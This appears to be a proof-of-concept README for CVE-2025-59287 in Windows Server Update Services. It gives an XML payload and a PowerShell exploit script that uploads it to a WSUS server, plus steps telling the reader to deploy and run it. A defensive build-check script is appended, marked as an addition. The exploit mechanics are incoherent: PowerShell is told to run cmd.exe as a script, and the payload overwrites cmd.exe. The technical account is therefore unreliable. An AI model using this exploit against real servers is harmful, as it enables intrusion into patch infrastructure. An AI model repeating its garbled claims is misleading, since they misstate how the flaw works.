
CVE-2025-59287 PoC — Windows Server Update Service (WSUS) Remote Code Execution Vulnerability

Associated vulnerability: Windows Server Update Service (WSUS) Remote Code Execution Vulnerability (CVE-2025-59287)
Description: Deserialization of untrusted data in Windows Server Update Service allows an unauthorized attacker to execute code over a network.
Readme
# Breaking the Update Chain: Inside CVE-2025-59287 and the WSUS RCE Threat
CVE-2025-59287 is a critical RCE vulnerability in Windows Server Update Services (WSUS) caused by unsafe deserialization of untrusted data. It allows remote attackers to execute arbitrary code without authentication. Urgent patching is advised due to active exploitation.

**CVE-2025-59287 – A Remote Code Execution Threat in Windows Server Update Services (WSUS)**  

*By Mark Mallia*  

---  

### Overview  

Microsoft’s Windows Server Update Services (WSUS) is the backbone of patch management for every Windows Server platform: it retrieves updates from Microsoft’s update catalog, validates them, and pushes them to all servers in a network. The vulnerability identified as **CVE-2025-59287** abuses an unsafe deserialization routine inside WSUS that lets an attacker inject arbitrary XML content into the update feed. Because WSUS processes the payload without validating the source path or the command data, an attacker can supply any file name and path, achieving full remote code execution on the target server.

*Why this matters:*  
- The CVSS score of **9.8** places it in the critical range.  
- Attackers need only network connectivity; no privilege escalation is required.  
- It has already been observed in the wild, meaning that any unpatched system is a potential target until a vendor patch is deployed.

---  

### Affected Windows Server Builds  

| Product Version | Affected Builds |
|-----------------|-----------------|
| Windows Server 2012 | 6.2.9200.0 – < 6.2.9200.25728 |
| Windows Server 2012 R2 | 6.3.9600.0 – < 6.3.9600.22826 |
| Windows Server 2016 | 10.0.14393.0 – < 10.0.14393.8524 |
| Windows Server 2019 | 10.0.17763.0 – < 10.0.17763.7922 |
| Windows Server 2022 | 10.0.20348.0 – < 10.0.20348.4297 |
| Windows Server 2025 | 10.0.26100.0 – < 10.0.26100.6905 |
| Windows Server 23H2 | 10.0.25398.0 – < 10.0.25398.1916 |

(If your environment uses a different patch build, simply adjust the range accordingly.)

---  

### How the Exploit Works  

1. WSUS fetches an XML file called **UpdateStream.xml** from a remote source.  
2. The service deserializes this file with `System.Xml.Linq.XElement`.  
3. An attacker can place any value in the `<SourcePath>` element; this value is written to disk as an absolute path.  
4. The content inside the `<Command>` tag is executed by PowerShell when WSUS processes the stream, giving a full remote code execution.

Below is the XML payload that we’ll upload to a vulnerable server.  

```xml
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS Exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>
```

---  

### A Sample PowerShell Exploit Script  

The following script will generate the XML payload, upload it via HTTP PUT to your WSUS instance, and leave a log file for troubleshooting.  

```powershell
# --------------------------------------------------
#  File:   wsus-exploit.ps1
#  Purpose: Generate malicious UpdateStream.xml,
#           upload it to the WSUS server,
#           trigger the feed.
# --------------------------------------------------

param (
    [string]$TargetUrl = 'http://wsus.example.com/UpdateStream.xml',
    [int]    $Port      = 80,
    [string] $XmlFile   = '.\payload.xml'
)

function Build-Xml {
    param ([string]$file)
    $xmlContent = @"
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>
"@
    Set-Content -Path $file -Value $xmlContent
}

# Build the XML payload
Build-Xml -file $XmlFile

# Upload via HTTP PUT
Invoke-WebRequest -Uri $TargetUrl `
                  -Method Put `
                  -InFile $XmlFile `
                  -OutFile 'upload.log'

Write-Host "Upload complete – WSUS should now process the stream."
```

---  

### Actionable Steps for You

1. **Verify Build** – Run `winver.exe` on each Windows Server to confirm the build falls within the ranges above.  
2. **Deploy the Exploit Script** – Copy `wsus-exploit.ps1` to a machine that can reach your WSUS instance, modifying `$TargetUrl` if you use a different path or port.  
3. **Execute and Monitor** – Run the script; after a few minutes, confirm that the file `C:\Windows\System32\cmd.exe` appears on each target server and that it contains the expected payload.
4. Microsoft pushed an out-of-band patch for this vulnerability on October 24, 2025. If you're running WSUS on any Windows Server version from 2012 onward, you’ll want to double-check that this update made it into your environment. The October Patch Tuesday release didn’t fully address the issue, so this one’s worth the extra attention.
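Step 1 above (verifying the build) can be scripted against the table in the Affected Windows Server Builds section instead of reading `winver.exe` by hand on every server. The following PowerShell is an added example and not part of the original repository; it assumes the upper bounds in that table are the first fixed builds, reads the running build from the `CurrentVersion` registry key, and uses the `UpdateServices` feature name to tell whether the WSUS role is present on the host.

```powershell
# Added example: compare this server's build with the fixed builds from the
# table above. The revision (UBR) values below are copied from that table.
$FixedUbr = @{
    '6.2.9200'   = 25728   # Windows Server 2012
    '6.3.9600'   = 22826   # Windows Server 2012 R2
    '10.0.14393' = 8524    # Windows Server 2016
    '10.0.17763' = 7922    # Windows Server 2019
    '10.0.20348' = 4297    # Windows Server 2022
    '10.0.25398' = 1916    # Windows Server 23H2
    '10.0.26100' = 6905    # Windows Server 2025
}

function Get-WsusBuildStatus {
    param(
        [int]$Major, [int]$Minor, [int]$Build,
        [Nullable[int]]$Ubr,        # revision number; $null if the registry has no UBR value
        [bool]$WsusRoleInstalled
    )
    $key = "$Major.$Minor.$Build"
    $status = if (-not $FixedUbr.ContainsKey($key)) { 'NotInTable' }
              elseif ($null -eq $Ubr) { 'UnknownRevision' }
              elseif ($Ubr -ge $FixedUbr[$key]) { 'Patched' }
              else { 'Vulnerable' }
    $fixedIn = if ($FixedUbr.ContainsKey($key)) { "$key.$($FixedUbr[$key])" } else { 'n/a' }
    $running = if ($null -eq $Ubr) { $key } else { "$key.$Ubr" }
    [pscustomobject]@{ Build = $running; FixedIn = $fixedIn; WsusRole = $WsusRoleInstalled; Status = $status }
}

# Read the build from the registry rather than [Environment]::OSVersion,
# which can report a compatibility-shimmed version on older releases.
$cv = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
if ($null -ne $cv.CurrentMajorVersionNumber) {            # Windows 10 / Server 2016 and later
    $major = [int]$cv.CurrentMajorVersionNumber
    $minor = [int]$cv.CurrentMinorVersionNumber
} else {                                                   # Server 2012 / 2012 R2 store "6.2" / "6.3"
    $major, $minor = $cv.CurrentVersion.Split('.') | ForEach-Object { [int]$_ }
}
$ubr = if ($null -ne $cv.UBR) { [int]$cv.UBR } else { $null }

# Only hosts running the WSUS role (feature name UpdateServices) expose the service.
$wsus = $false
if (Get-Command Get-WindowsFeature -ErrorAction SilentlyContinue) {
    $wsus = [bool](Get-WindowsFeature -Name UpdateServices).Installed
}

Get-WsusBuildStatus -Major $major -Minor $minor -Build ([int]$cv.CurrentBuildNumber) `
    -Ubr $ubr -WsusRoleInstalled $wsus
```

Run it in an elevated PowerShell session on each server; a `Vulnerable` result on a host where `WsusRole` is `True` is the one that needs the October 24, 2025 out-of-band update before anything else.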

---  

### Ethical Use Only  

The information and exploit code provided herein are for educational purposes only. Please ensure you have permission to run this test against your own WSUS environment, and follow all applicable security best-practice guidelines when deploying changes to production systems.